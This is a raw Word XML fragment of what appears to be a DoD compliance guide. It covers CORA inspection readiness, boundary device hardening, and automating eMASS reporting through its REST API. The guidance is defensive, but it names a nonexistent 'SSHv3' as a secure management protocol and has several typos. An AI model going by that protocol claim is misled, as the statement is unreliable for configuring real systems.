      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Utilize Continuous APIs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F6B912" w14:textId="59745A92" w:rsidR="00D66D8A" w:rsidRPr="00E96FF2" w:rsidRDefault="00D66D8A" w:rsidP="00E96FF2">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Instead of manually formatting Excel spreadsheets or .ckl files, push automated output directly into specialized tools</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">that stream continuous telemetry via the </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>eMASS REST Web Services API</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749A750C" w14:textId="0AF30306" w:rsidR="001C16B0" w:rsidRPr="00E96FF2" w:rsidRDefault="001C16B0" w:rsidP="00E96FF2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E96FF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Implementation Action Plan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31865D94" w14:textId="55A32E7F" w:rsidR="001C16B0" w:rsidRPr="00E96FF2" w:rsidRDefault="001C16B0" w:rsidP="00E96FF2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E96FF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>To implement this framework effectively, systems administrators, security teams, and enterprise network defenders must shift their daily workloads and workflows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9ABCF4" w14:textId="1350A830" w:rsidR="001C16B0" w:rsidRPr="00E96FF2" w:rsidRDefault="001C16B0" w:rsidP="00E96FF2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E96FF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Prioritize the Boundary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D467BB" w14:textId="12A1F25A" w:rsidR="001C16B0" w:rsidRPr="00E96FF2" w:rsidRDefault="001C16B0" w:rsidP="00E96FF2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E96FF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Use vulnerability scanners to immediately locate and resolve any open findings on assets interacting with external or public traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49629C5B" w14:textId="77777777" w:rsidR="00D66D8A" w:rsidRPr="00E96FF2" w:rsidRDefault="00D66D8A" w:rsidP="00E96FF2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14402A67" w14:textId="102E04E3" w:rsidR="001C16B0" w:rsidRPr="00E96FF2" w:rsidRDefault="001C16B0" w:rsidP="00E96FF2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E96FF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Move to a “cATO” Mindset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A51705" w14:textId="5416AF25" w:rsidR="001C16B0" w:rsidRPr="00E96FF2" w:rsidRDefault="001C16B0" w:rsidP="00E96FF2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E96FF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Treat network defenses as a path toward a Continuous Authorization to Operate (cATO) rather than an explicit multi-year re-certification milestone.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F92CAF7" w14:textId="77777777" w:rsidR="00D66D8A" w:rsidRPr="00E96FF2" w:rsidRDefault="00D66D8A" w:rsidP="00E96FF2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0592481F" w14:textId="5286F752" w:rsidR="001C16B0" w:rsidRPr="00E96FF2" w:rsidRDefault="001C16B0" w:rsidP="00E96FF2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E96FF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Deploy Policy-as-Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D1B78E" w14:textId="5BA840A6" w:rsidR="00D66D8A" w:rsidRPr="00E96FF2" w:rsidRDefault="001C16B0" w:rsidP="00E96FF2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E96FF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Leverage automated configuration files to automatically apply DISA STIG updates as soon as new guidelines are released.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D406F6A" w14:textId="46C7EF7B" w:rsidR="00D66D8A" w:rsidRPr="00E96FF2" w:rsidRDefault="00D66D8A" w:rsidP="00E96FF2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E96FF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Securing Network Boundary Devices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196DB76C" w14:textId="414E0980" w:rsidR="00D66D8A" w:rsidRPr="00E96FF2" w:rsidRDefault="00D66D8A" w:rsidP="00E96FF2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E96FF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The network boundary is the primary focus of JFHQ-DoDINs CORA inspection program. Assessors target the </w:t>
      </w:r>
      <w:r w:rsidRPr="00E96FF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">perimeter devices, pubic-facing assets, and external connections </w:t>
      </w:r>
      <w:r w:rsidRPr="00E96FF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>that link a DoD component (e.g., public-facing WAN ISP circuit) to the wider internet or other military networks often via a P2P gateway.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9DD965" w14:textId="4DA906B4" w:rsidR="00D66D8A" w:rsidRPr="00E96FF2" w:rsidRDefault="00D66D8A" w:rsidP="00E96FF2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E96FF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Isolate Public-Facing Interfaces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0BDF9E" w14:textId="17E7CA7E" w:rsidR="00D66D8A" w:rsidRPr="00E96FF2" w:rsidRDefault="00D66D8A" w:rsidP="00E96FF2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E96FF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Enforce strict Access Control Lists (ACLs) on all external gateways. Ensure that public-facing systems are fully isolated, air</w:t>
      </w:r>
      <w:r w:rsidR="00E96FF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00E96FF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>gapped, or segregated from the internal Local Area Network (KAN) and network core using DMZs to block lateral movement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453CEB11" w14:textId="1E26AFEF" w:rsidR="00D66D8A" w:rsidRPr="00E96FF2" w:rsidRDefault="00D66D8A" w:rsidP="00E96FF2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E96FF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Eliminate Insecure Management Protocols</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B591D1E" w14:textId="67F7E7C0" w:rsidR="00D66D8A" w:rsidRPr="00E96FF2" w:rsidRDefault="00D66D8A" w:rsidP="00E96FF2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E96FF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Disable </w:t>
      </w:r>
      <w:r w:rsidR="00E96FF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>unencrypted</w:t>
      </w:r>
      <w:r w:rsidRPr="00E96FF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> management access (like HTTP or Telnet) on boundary routers, switches, and firewalls. All administrative sessions must use secure channels, such as SSHv3 or HTTPS with TLS 1.3 enabled) protected by Multi-Factor Authentication (MFA/CAC/PIV).</w:t>
      </w:r>
      <w:r w:rsidR="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00E96FF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00E96FF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Patch Key Indicators of Risk (KIORs) Instantly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3FB2CC" w14:textId="2782241B" w:rsidR="00D66D8A" w:rsidRPr="00E96FF2" w:rsidRDefault="00D66D8A" w:rsidP="00E96FF2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E96FF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Treat boundary patches as the highest priority. Vulnerabilities affecting internet-facing boundary devices are heavily weighted; an unpatched edge firewall can single-handedly cause an unsatisfactory assessment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6EB064" w14:textId="52C2911D" w:rsidR="00D66D8A" w:rsidRPr="00E96FF2" w:rsidRDefault="00D66D8A" w:rsidP="00E96FF2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E96FF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Monitor Session Deflection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E521261" w14:textId="7491D527" w:rsidR="00D66D8A" w:rsidRPr="00E96FF2" w:rsidRDefault="00D66D8A" w:rsidP="00E96FF2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E96FF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Implement strict boundary logging to record all blocked network traffic (ingress and egress) and failed authentication attempts. Network defenders must review these logs daily to detect early-stage adversary probing mapped to the MITRE ATT&amp;CK Framework.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154D4971" w14:textId="48C6974D" w:rsidR="00D66D8A" w:rsidRPr="00E96FF2" w:rsidRDefault="00D66D8A" w:rsidP="00E96FF2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E96FF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Integrating Automation Tools with eMASS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8C09F5" w14:textId="2D1A4A25" w:rsidR="00D66D8A" w:rsidRPr="00E96FF2" w:rsidRDefault="00D66D8A" w:rsidP="00E96FF2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E96FF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The Enterprise Mission Assurance Support Service (eMASS) is the DoD application used to track Risk Management Framework (RMF) compliance and authorize information systems. Manually uploading scan results, evidence, and artifacts to eMASS creates massive lag times that clash with CORAs requirement for continuous monitoring. Modern compliance automation platforms have been created to bridge this gap using data integration web services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D054BD3" w14:textId="385884B1" w:rsidR="00D66D8A" w:rsidRPr="00E96FF2" w:rsidRDefault="00D66D8A" w:rsidP="00E96FF2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E96FF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>eMASS Tool: Automation Workflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343E2480" w14:textId="505FBFF5" w:rsidR="00D66D8A" w:rsidRPr="00E96FF2" w:rsidRDefault="00D66D8A" w:rsidP="00E96FF2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E96FF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Automation Tool (ConfigOS/Scanners) Generate Assessment   &gt;&gt;   eMASS Web API (JSON/REST Endpoint) Ingest Scans   &gt;&gt;   eMASS Package (Security Control) Scorecard Update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D5761C" w14:textId="3FE7CE12" w:rsidR="00D66D8A" w:rsidRPr="00D5581E" w:rsidRDefault="00D66D8A" w:rsidP="00E96FF2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5581E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Leverage the eMASS Web Services API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B108A0" w14:textId="0E831DB8" w:rsidR="00D66D8A" w:rsidRPr="00E96FF2" w:rsidRDefault="00D66D8A" w:rsidP="00E96FF2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E96FF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Utilize authorized automation tools, such as SteelCloud ConfigOS that communicate directly with the eMASS RESTful JSON API. This connection allows machine-to-machine transfer of system compliance data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C113EF8" w14:textId="5D4883BA" w:rsidR="00D66D8A" w:rsidRPr="00D5581E" w:rsidRDefault="00D66D8A" w:rsidP="00E96FF2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5581E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Automate Security Control Assessments (SCAs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6DA204" w14:textId="7653C2AB" w:rsidR="00D66D8A" w:rsidRPr="00E96FF2" w:rsidRDefault="00D66D8A" w:rsidP="00E96FF2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E96FF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Configure STIG automation tool to automatically map technical patch states to specific NIST SP 800-53 security controls in eMASS</w:t>
      </w:r>
      <w:r w:rsidR="00D5581E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E96FF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> When a tool fixes a configuration vulnerability, it will validate the associated eMASS control automatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7068B135" w14:textId="7FBAF1C0" w:rsidR="00D66D8A" w:rsidRPr="00D5581E" w:rsidRDefault="00D66D8A" w:rsidP="00E96FF2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5581E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Establish Continuous Monitoring Pipelines</w:t>
      </w:r>
